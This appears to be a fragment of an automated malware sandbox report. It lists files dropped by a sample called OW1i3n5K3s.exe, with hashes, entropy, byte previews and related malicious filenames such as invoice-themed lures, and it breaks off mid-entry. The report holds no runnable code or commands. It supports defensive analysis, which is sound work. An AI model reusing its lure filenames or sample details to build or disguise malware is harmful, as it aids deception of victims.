                                                                                                                                                SHA-512:1BD260CABE5EA3CEFBBC675162F30092AB157893510F45A1B571489E03EBB2903C55F64F89812754D3FE03C8F10012B8078D1261A7E73AC1F87C82F714BCE03D
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Joe Sandbox View:
                                                                                                                                                • Filename: facturas gastos.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: Factura proforma.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: Contract-pdf.bat.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: Contract-pdf.bat.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: m4JIZpBl3o.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: UMOWA_20.BAT.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: JOWcitzTY4.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: dBMacros.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: dBMacros.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: PSAP_toolkit.exe, Detection: malicious, Browse
                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L...S.d...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmc.ini

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\OW1i3n5K3s.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):28
                                                                                                                                                Entropy (8bit):4.110577243331642
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:iGAeTUHvn:lAeTUHv
                                                                                                                                                MD5:F6A80CF0B011E1638B38D8EAA2A9629B
                                                                                                                                                SHA1:30AB7FEEC5D0A304ED9908ADD562601E3E7118C3
                                                                                                                                                SHA-256:AB3B162F39F8FDBD8DD767791EC116E75DA198FCE6BABBA6E1677044678714D8
                                                                                                                                                SHA-512:E1EC33696EA5086DEA0A52B577442B96124B71CD09999637185D114B7E5F313D455560C350F5A02FBA83C5A3A12A5234EEC995D0AF0CBF64471B3887E2AA2ED8
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                Preview:[Access]..Setting=Disabled..

                                                                                                                                                C:\Users\user\AppData\Local\interdifferentiate\Aflggerens.jpg

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\OW1i3n5K3s.exe
                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 688x713, components 3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):41501
                                                                                                                                                Entropy (8bit):7.917825064420613
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:XRqOmfmSUm9eMDhOmW+QlH6bDTrAqKwmn4+UwdNcKO6J:XYUh0OmSliQN4+Uu66J
                                                                                                                                                MD5:2DC989C33059D0EF3A31306CE6C46186
                                                                                                                                                SHA1:94B7EF506CFCFE807E1F9054921DCF9EF1DA5B34
                                                                                                                                                SHA-256:BBA097FEC91F75D86F320B8D6CD15DC381ECF62AF8F169F57FF052F777A434C9
                                                                                                                                                SHA-512:C56F253CA3E4403A5ADF7198677FEB11509C48869D8E57852C0166005E442D672FA21F0B408851200016897FF414955A93FE6E452AF88DDB64B1A3D9A50F43E5
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..(.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(....Q..(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...;.Gz.(.4f..(.....3E..QE..QE..QE.

                                                                                                                                                C:\Users\user\AppData\Local\interdifferentiate\Elicitate\Indsmuglings.txt

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\OW1i3n5K3s.exe
                                                                                                                                                File Type:CSV text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):500
                                                                                                                                                Entropy (8bit):4.2763099578021535
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:NpqQjiJpNcFaGRQsF0L63OTYhhillGRrSr5:Pkc2GU2lhhillkrSr5
                                                                                                                                                MD5:925580CB79AE485FEBA2A671F6718A80
                                                                                                                                                SHA1:8A908C17BF8AE8641AF92343F32A99F80D67EE59
                                                                                                                                                SHA-256:07F5975252C385C0F9F94EA354B0BCE1FC9220872E481340B0812236C8B00BDF
                                                                                                                                                SHA-512:A55517D6FDA66695E8F9C1F7005AE6C6C391C607394577868CE75902C5E2358636C7862C0065A7A150752416657D11843174F8A1C4E634FA1CBBC1550A756EAD
                                                                                                                                                Malicious:false